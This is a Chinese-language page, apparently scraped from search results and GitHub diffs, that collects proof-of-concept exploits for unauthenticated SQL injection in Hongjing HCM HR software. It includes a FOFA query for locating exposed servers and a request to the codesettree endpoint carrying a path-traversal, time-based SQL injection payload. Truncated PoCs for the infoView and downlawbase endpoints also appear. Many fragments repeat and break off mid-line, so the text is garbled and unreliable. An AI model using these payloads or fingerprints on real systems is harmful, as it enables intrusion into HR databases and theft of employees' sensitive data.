宏景HCM<8.2 漏洞复现 fofa语法:FOFA:body='
宏景人力资源管理软件是一款人力资源管理与数字化应用相融合,满足动态化、协同化、流程化、战略化需求的软件。 宏景HCM fieldsettree 接口处存在SQL注入漏洞,未经过身份认证的远程攻击者可利用此漏洞执行任意SQL指令,从而窃取数据库敏感信息。 漏洞危害 未经过身份认证的远程攻击者可利用此漏洞执行任意SQL指令,从而窃取数...
13 changes: 13 additions & 0 deletions 13 宏景HCM-codesettree接口存在SQL注入漏洞.md Original file line numberDiff line numberDiff line change @@ -0,0 +1,13 @@ ## 宏景HCM-codesettree接口存在SQL注入漏洞 ## poc ``` GET /templates/attestation/../../servlet/codesettree?flag=3&codesetid...
25 changes: 25 additions & 0 deletions 25 宏景HCM系统infoView处存在sql注入漏洞.md Original file line numberDiff line numberDiff line change @@ -0,0 +1,25 @@ ## 宏景HCM系统infoView处存在sql注入漏洞 ## fofa ``` app="HJSOFT-HCM" ``` ## poc ``` GET /templates/attestation/../.....
宏景HCM SQL注入漏洞(CNVD-2023-08743) ,hrms加解密工具。需要 Java1.8 环境,执行如下命令启动 HrmsTool 工具, -e 是加密, -d 是解密。$ java -jar HrmsTool.jarUsage: java -jar HrmsTool.jar -e xxx java -jar HrmsTool.jar -d xxx
##宏景HCM-codesettree接口存在SQL注入漏洞 ##poc ``` GET /templates/attestation/../../servlet/codesettree?flag=3&codesetid=111';waitfor+delay+'0:0:2'--+&parentid=-1&fromflag=" HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:50.0) ...
25 changes: 25 additions & 0 deletions 25 宏景HCM系统infoView处存在sql注入漏洞.md Original file line numberDiff line numberDiff line change @@ -0,0 +1,25 @@ ## 宏景HCM系统infoView处存在sql注入漏洞 ## fofa ``` app="HJSOFT-HCM" ``` ## poc ``` GET /templates/attestation/../.....
25 changes: 25 additions & 0 deletions 25 宏景HCM系统infoView处存在sql注入漏洞.md Original file line numberDiff line numberDiff line change @@ -0,0 +1,25 @@ ## 宏景HCM系统infoView处存在sql注入漏洞 ## fofa ``` app="HJSOFT-HCM" ``` ## poc ``` GET /templates/attestation/../.....
13 changes: 13 additions & 0 deletions 13 宏景HCM-downlawbase接口存在SQL注入漏洞.md Original file line numberDiff line numberDiff line change @@ -0,0 +1,13 @@ ## 宏景HCM-downlawbase接口存在SQL注入漏洞 ## poc ``` GET /templates/attestation/../../selfservice/lawbase/downlawbase?id...
13 changes: 13 additions & 0 deletions 13 宏景HCM-downlawbase接口存在SQL注入漏洞.md Original file line numberDiff line numberDiff line change @@ -0,0 +1,13 @@ ## 宏景HCM-downlawbase接口存在SQL注入漏洞 ## poc ``` GET /templates/attestation/../../selfservice/lawbase/downlawbase?id...